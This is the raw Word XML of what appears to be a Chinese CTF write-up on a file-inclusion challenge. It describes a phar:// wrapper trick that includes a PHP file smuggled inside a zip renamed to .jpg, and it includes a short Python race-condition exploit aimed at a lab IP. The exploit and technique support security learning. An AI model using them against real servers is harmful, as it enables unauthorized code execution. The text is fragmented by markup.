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AC5" w:rsidRPr="00202AC5" w:rsidRDefault="00202AC5" w:rsidP="00202A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Helvetica Neue" w:eastAsia="宋体" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202AC5">
        <w:t>Web安全四</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063366E" w:rsidRDefault="00202AC5" w:rsidP="00202AC5">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="72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知识点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：文件包含</w:t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打开靶机，是这样一个页面。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381EC631" wp14:editId="2D509F01">
            <wp:extent cx="5270500" cy="1462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有个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hint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，访问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0D8CB55A" wp14:editId="17D85FBE">
            <wp:extent cx="5270500" cy="31127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查看源码，又有个提示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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D2E679B" wp14:editId="52223E87">
            <wp:extent cx="5270500" cy="3255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尝试上传文件，发现又有一个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hin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t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。且只能上传图片。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66403DD4" wp14:editId="0501E444">
            <wp:extent cx="5270500" cy="34524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访问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proofErr w:type="spellStart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hint.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，查看源码，发现又有个提示。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0B51509D" wp14:editId="03858967">
            <wp:extent cx="5270500" cy="1462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lastRenderedPageBreak/>
        <w:t>有文件包含，可以将文件源码读下来。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3D5FF59E" wp14:editId="4A57C5A4">
            <wp:extent cx="5270500" cy="57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将文件源码全部爬下来。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669ADB14" wp14:editId="15B8903C">
            <wp:extent cx="5270500" cy="2329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发现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upload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之后会出发那个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a6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那个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proofErr w:type="spellStart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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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去删文件，但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jpg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不会删。</w:t>
      </w:r>
      <w:r w:rsidRPr="00202AC5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44C62AC8" wp14:editId="3A1BEB21">
            <wp:extent cx="5270500" cy="3989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同时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hint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的文件包含基本没有过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202AC5" w:rsidRPr="00202AC5" w:rsidRDefault="00202AC5" w:rsidP="00202AC5">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:r w:rsidRPr="00202AC5">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E2B9972" wp14:editId="660F6847">
            <wp:extent cx="5270500" cy="22459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这样就好办了，传一个构造一个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proofErr w:type="spellStart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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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的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zi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p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包，后缀改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jpg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上去，然后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proofErr w:type="spellStart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phar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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去读压缩包然后读里面的文件包含上即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C16AC8" w:rsidRDefault="00C16AC8" w:rsidP="00C16AC8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</w:pPr>
      <w:r w:rsidRPr="00C16AC8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="宋体" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A023A2" wp14:editId="79BD3049">
            <wp:extent cx="4820142" cy="204130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352" cy="20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5" w:rsidRDefault="00202AC5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  <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="宋体" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>E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xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202AC5" w:rsidRPr="00202AC5" w:rsidRDefault="00202AC5" w:rsidP="00202A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import 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requests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>while True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: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  <w:t xml:space="preserve">    r = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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requests.post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'http://172.1.31.3/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uploadupload.php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202AC5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="宋体" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="AA4926"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>files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={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'file'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: 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"testglzjin.jpg"</w:t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202AC5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="宋体" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="8888C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>open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'testglzjin.jpg'</w:t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rb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))})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  <w:t xml:space="preserve">    filename = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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r.text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[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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r.text.find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'&lt;div id="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msg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"&gt;'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 xml:space="preserve">) + </w:t>
      </w:r>
      <w:r w:rsidRPr="00202AC5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="宋体" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>14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:r.text.find(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'&lt;/div&gt;'</w:t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r.text.find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'&lt;div id="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msg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"&gt;'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))]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  <w:t xml:space="preserve">    r2 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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requests.get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'http://172.1.31.3/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hint.php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r w:rsidRPr="00202AC5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202AC5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="宋体" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="AA4926"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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={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'name'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 xml:space="preserve">: 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phar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://file/' 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 xml:space="preserve">+ filename + </w:t>
      </w:r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'/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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testglzjin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00202AC5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="宋体" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'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})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br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00202AC5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="宋体" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="8888C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00202AC5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="宋体" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(r2.text)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202AC5" w:rsidRDefault="00202AC5" w:rsidP="00202AC5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
        <w:ind w:left="1080" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="宋体" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C16AC8" w:rsidRDefault="00C16AC8" w:rsidP="00202AC5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</w:pP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 xml:space="preserve">Flag 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到手</w:t>
      </w:r>
      <w:r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  <w:t>~</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00202AC5" w:rsidRPr="00C16AC8" w:rsidRDefault="00C16AC8" w:rsidP="00C16AC8">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="宋体" w:hAnsi="Helvetica Neue" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C16AC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19126211" wp14:editId="490E1D72">
            <wp:extent cx="5270500" cy="8197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AC5" w:rsidRPr="00C16AC8" w:rsidSect="00E249C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701D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2BA11C6"/>
    <w:lvl w:ilvl="0" w:tplc="82207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695818FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FD2A160"/>
    <w:lvl w:ilvl="0" w:tplc="BFB63744">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="72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C5"/>
    <w:rsid w:val="00202AC5"/>
    <w:rsid w:val="0063366E"/>
    <w:rsid w:val="00C16AC8"/>
    <w:rsid w:val="00E249CA"/>
    <w:rsid w:val="00F0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D8B4A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{21B6CBA1-51CF-C449-AE34-DAA3C36A2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isinb">
    <w:name w:val="dis_inb"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00202AC5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00202AC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02A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2AC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4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7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7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06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11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2019-06-08T08:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-08T08:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>